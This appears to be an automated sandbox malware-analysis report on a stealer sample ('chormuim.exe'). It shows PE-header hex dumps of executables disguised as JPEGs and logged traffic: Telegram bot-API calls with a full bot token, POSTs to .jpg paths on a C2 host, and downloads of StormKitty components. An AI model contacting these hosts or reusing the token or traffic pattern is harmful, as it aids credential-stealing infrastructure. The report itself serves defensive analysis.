00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 36 33 00 00 00 00 00 84 0d 00 00 00 b0 08 00 00 0e 00 00 00 38 08
Source: http	Image file has PE prefix: HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 12:49:23 GMT Server: Apache Last-Modified: Thu, 06 Jun 2019 09:00:58 GMT Accept-Ranges: bytes Content-Length: 334288 Keep-Alive: timeout=5, max=73 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: http	Image file has PE prefix: HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 12:49:24 GMT Server: Apache Last-Modified: Thu, 06 Jun 2019 09:01:20 GMT Accept-Ranges: bytes Content-Length: 137168 Keep-Alive: timeout=5, max=72 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: http	Image file has PE prefix: HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 12:49:24 GMT Server: Apache Last-Modified: Thu, 06 Jun 2019 09:01:30 GMT Accept-Ranges: bytes Content-Length: 440120 Keep-Alive: timeout=5, max=71 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: http	Image file has PE prefix: HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 12:49:25 GMT Server: Apache Last-Modified: Thu, 06 Jun 2019 09:01:44 GMT Accept-Ranges: bytes Content-Length: 1246160 Keep-Alive: timeout=5, max=70 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: http	Image file has PE prefix: HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 12:49:27 GMT Server: Apache Last-Modified: Thu, 06 Jun 2019 09:02:02 GMT Accept-Ranges: bytes Content-Length: 83784 Keep-Alive: timeout=5, max=69 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Uses the Telegram API (likely for C&C communication)

Show sources

Source: unknown

DNS query: name: api.telegram.org

May check the online IP address of the machine

Show sources

Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	DNS query: name: ip-api.com
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	DNS query: name: icanhazip.com
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	DNS query: name: icanhazip.com
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	DNS query: name: ip-api.com

Posts data to a JPG file (protocol mismatch)

Show sources

Source: unknown

HTTP traffic detected: POST /Cgi//6.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: pplonline.orgConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: aegismd.ca/cgi/

Source: global traffic	HTTP traffic detected: GET /caxmd/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13.8/lib/net40/DotNetZip.dll HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /caxmd/StormKitty/master/StormKitty/stub/packages/AnonFileApi.1.14.6/lib/net40/AnonFileApi.dll HTTP/1.1Host: raw.githubusercontent.com
Source: global traffic	HTTP traffic detected: GET /bot1456609378:AAEnBfmWHEJfWWOpiWK1aoQnqzDubVAn7J4/getMe HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Cgi//6.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: pplonline.orgConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /Cgi//1.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: pplonline.orgConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /Cgi//2.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: pplonline.orgConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /Cgi//3.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: pplonline.orgConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /Cgi//4.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: pplonline.orgConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
